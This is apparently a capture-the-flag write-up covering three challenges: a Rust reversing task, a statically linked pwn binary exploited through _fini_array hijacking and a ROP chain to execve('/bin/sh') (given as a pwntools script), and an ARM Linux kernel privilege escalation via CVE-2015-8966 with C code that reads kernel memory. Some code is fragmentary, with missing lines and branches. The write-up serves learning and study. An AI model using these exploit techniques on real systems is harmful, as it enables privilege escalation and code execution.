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beginner reverse

It is a binary written in Rust. Initially I got stuck into the Rust stuff, which wasted me much time. The main function at 0x66A0 is long, but many of them are junk codes that do not help to solve the challenge. In fact, the core logic is this loop

  if ( v15 == v22 )
  v25 = ((*((_DWORD *)v30 + v23) >> 2) ^ 0xA) == *(_DWORD *)&v15[4 * v23];
  // if we set a breakpoint here, v15 is the input but is unsigned extended to DWORD array
  v24 += v25;
  v22 -= 4;

Here it compares the input with something, which is initialized here

*v0 = xmmword_51000;
v0[1] = xmmword_51010;
v0[2] = xmmword_51020;
v0[3] = xmmword_51030;
v0[4] = xmmword_51040;
v0[5] = xmmword_51050;
v0[6] = xmmword_51060;
v0[7] = xmmword_51070;
*((_QWORD *)v0 + 16) = 0x1DE000001E2LL;

And it is obvious that the transformation is (data[i] >> 2) ^ 0xA, where data is an uint32_t array.

Thus, we can decrypt the flag using IDA Python

Python>flag = ""
Python>for p in range(0x51000, 0x51080, 4) + range(0x6722, 0x672a, 4):
Python>  flag += chr((Dword(p) >> 2) ^0xA)


The binary can leak the stack address or PIE address of the program, then an arbitrary 8-byte write is performed, then the program exits. The program was statically linked, so there is no libc. Also since the program has not used execve, so this function is not provided. Our only way is to use ret2syscall by ROP. So we need to leak the 2 addresses without quiting first. The way to not quit after leaking is to rewrite return address in stack. For example, in function main,

do_leak is called.

.text:00007FFFF7D52B04                 call    do_leak
.text:00007FFFF7D52B09                 nop

And the value 0x00007FFFF7D52B09 is stored as the return address. (value might change if ASLR is enabled)

If we rewrite the least significant byte 0x09 to 0x04, we can execute do_leak again after retn. In this way we can leak both stack and pie, and still return to the function do_leak.

Then here is the difficult part. Since we can only control 0xf bytes in stack using read in read_int_3, we cannot easily construct a ROP chain that allows ret2syscall. Initially I decided to rewrite the return address to the start of do_leak instead of call stack in main function, in this way we can "shift" the stack down by 8 bytes each time. In the meanwhile, we can gradually construct a ROP chain using read in read_int_3, with 8 bytes each time. But this failed to work because puts function will overwrite the data that I have putted using read_int_3 in the last do_write.

Then, I found a permanent way to always restart the program: hook the _fini_array function table, the functions inside which will be called when exit function is called, and the exit function will be called after main function returns. Thus, If we can change the one of the functions into _start, can we alway restart the program after it exits? Unfortunately no. It seems that when the __libc_start_main is called second time, a segmentation fault will be created in subroutine dl_relocate_static_pie.

Well, if we cannot return to _start to restart everything, why not hook _fini_array into function like do_overwrite? Actually this turns out to be the correct(but not necessarily intended?) method. However, the exit function will not be called after the subroutine function returns, so we cannot restart again directly. Luckily, there are 2 entries in _fini_array, which will be called in the reverse order. If we can change both of the 2 entries to do_overwrite, we can use the first one to rewrite return address to __libc_csu_fini(The function that calls the functions in the _fini_array) and use the second one to construct ROP, so after then we can return to __libc_csu_fini again and do the same thing next time.

I chose to construct ROP below the current rsp because there are many gadgets like add rsp,xxx; ret. Finally, I used an add rsp, 0xd0; pop xxx; ret to pivot the rsp onto ROP.


from pwn import *

p = ELF("./onewrite")
if g_local:
	sh = process('./onewrite')#env={'LD_PRELOAD':'./'}
	sh = remote("", 1337)

def leak(cmd):
	sh.recvuntil(" > ")
	ret = int(sh.recvuntil("\n"), 16)
	return ret

def fill_stack(cmd):
	sh.recvuntil(" > ")

def write(addr, data):
	sh.recvuntil("address : ")
	sh.recvuntil("data : ")

stack_addr = leak("1\x00")
write(stack_addr + 0x18, p8(0x04)) # b09->b04
prog_addr = leak("2\x00") - p.symbols["do_leak"]
write(stack_addr + 0x18, p8(0x04)) # b09->b04
print hex(stack_addr), hex(prog_addr)

fini_arr = prog_addr + p.symbols["__do_global_dtors_aux_fini_array_entry"]
do_overwrite = p64(prog_addr + p.symbols["do_overwrite"])
csu_fini = p64(prog_addr + p.symbols["__libc_csu_fini"])

init_ret = stack_addr - 72

write(fini_arr + 8, do_overwrite) #write 2nd entry of fini_arr
write(fini_arr, do_overwrite) #write 1st entry of fini_arr
write(init_ret, csu_fini) #write return address to csu_fini

init_ret += 8

def write_qword(addr, val):
	global init_ret
	write(init_ret, csu_fini)
	init_ret += 8
	write(addr, p64(val))

pop_rdi = p64(prog_addr + 0x84fa)
pop_rsi = p64(prog_addr + 0xd9f2)
pop_rdx = p64(prog_addr + 0x484c5)
pop_rax = p64(prog_addr + 0x460ac)
syscall = p64(prog_addr + 0x4610e)
bin_sh_buf = prog_addr + 0x2b4500

rop = pop_rdi
rop += p64(bin_sh_buf)
rop += pop_rsi
rop += p64(0)
rop += pop_rdx
rop += p64(0)
rop += pop_rax
rop += p64(59)
rop += syscall

write_qword(bin_sh_buf, u64("/bin/sh\x00"))

for i in xrange(0, len(rop), 8):
	write_qword(init_ret + 0x108, u64(rop[i:i+8]))
write(stack_addr - 16, p64(prog_addr + 0x106f3)) # add rsp,0xd8 ; ret


# init_ret = stack_addr + 0x18
# for i in xrange(0, 0x100, 8):
# 	fill_stack('A' * 15)
# 	write(init_ret + i, p64(prog_addr + p.symbols["do_leak"]))


Searching for CVE-2015-8966, we can find the patch for this vulnerability here. So this is a 32-bit ARM Linux kernel privilege escalation challenge. A qemu environment is given. If you want to learn more about kernel exploitation environment configuration, you can read it here; the only difference is that this article is about x86-64 Linux kernel exploitation, so we use gdb-multiarch and arm-linux-gnueabi-gcc instead. After reading and comparing the codes before patch and codes after patch, we can find the only difference: for case F_OFD_GETLK,F_OFD_SETLK and F_OFD_SETLKW, the fs is not set back after calling set_fs(KERNEL_DS). So what does this function do? What I've found is this

The original role of set_fs() was to set the x86 processor's FS segment register which, in the early days, was used to control the range of virtual addresses that could be accessed by unprivileged code. The kernel has, of course, long since stopped using x86 segments this way. In current kernels, set_fs() works by setting a global variable called addr_limit, but the intended functionality is the same: unprivileged code is only allowed to dereference addresses that are below addr_limit. The kernel's access_ok() function, used to validate user-space accesses throughout the kernel, is a simple check against addr_limit, with the rest of the protection being handled by the processor's memory-management unit.

What it means is that if set_fs(KERNEL_DS) is called and not set back, we can use read and write to access kernel memory.

Then I tried to use fcntl to trigger the vulnerability, but it fails and the breakpoint on sys_oabi_fcntl64 does not work. Then I found fcntl and fcntl64 are 2 different syscall.


But after checking the binary, the syscall number is indeed 0xdd, which got me confused.

Finally, I found the way to trigger the vulnerability here(content in Chinese), which uses swi to call sys_oabi_fcntl64 instead of svc 0. After then, we can use read and write to access the kernel memory. But note, we cannot use direct access since that is handled by MMU. Then we can use unnamed pipe or a regular file. But note:

  1. after calling set_fs(KERNEL_DS), read(fd_file_or_pipe, user_addr, size) will cause kernel panic.
  2. after calling set_fs(KERNEL_DS), write(fd_file_or_pipe, kernel_unmapped_addr, size) will also cause kernel panic.

These are 2 problems that got me stuck for many hours. For the first one, we can solve it by calling fork and call set_fs(KERNEL_DS) for child process only, then write in the child process to get kernel data, and call read in parent process to receive the kernel data. For the second one, we can use write(1, kernel_addr, 8) to try to output the kernel data to stdout, which will not cause segmentation fault. Only if it returns 8, that means that page is mapped so we can write it to pipe without kernel panic. Here is my implementation of memcpy_kernel_page, which copy a page from src(kernel address) to global variable page.

void error_exit(const char* msg)
	write(2, msg, strlen(msg));
ssize_t memcpy_kernel_page(char* src)
	ssize_t ret;
	memset(page, 0, PAGE_SIZE);
	int fd[2];
	ret = pipe(fd);
	if (ret < 0) error_exit("pipe failed");
	pid_t proc = fork();//handle problem 1
	if (proc < 0) error_exit("fork failed");
	if (proc == 0)
		set_fs();//trigger vulnerability
		if (write(1, src, 8) != 8)
			error_exit("write kmem failed"); //handle problem 2
		if (write(fd[1], src, PAGE_SIZE) != PAGE_SIZE)
			error_exit("write kmem failed");
		int status;
		if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
			ret = PAGE_SIZE;
			ret = -1;
		if (read(fd[0], page, PAGE_SIZE) <= 0)
			error_exit("read kmem failed");
		if (ret > 0)
			printf("read kernel memory successfully, first QWORD %p, last QWORD %p\n",
				*(uintptr_t*)page, *(uintptr_t*)(page + PAGE_SIZE - sizeof(uintptr_t)));

		return ret;

The way to escalate privilege is to write cred. Firstly we can find the cred by brute force comm. The approach is same as the technique used in stringIPC. However, here is where I failed to solve the challenge in CTF: the maximum string length for comm is 15 instead of 16, with a \x00 added at index 15, but I used string with length of 16, which will cause the last byte to be truncated thus unmatched when using memmem(page, PAGE_SIZE, COMM, 16) to scan the memory!!! :(

Here is the final exploit.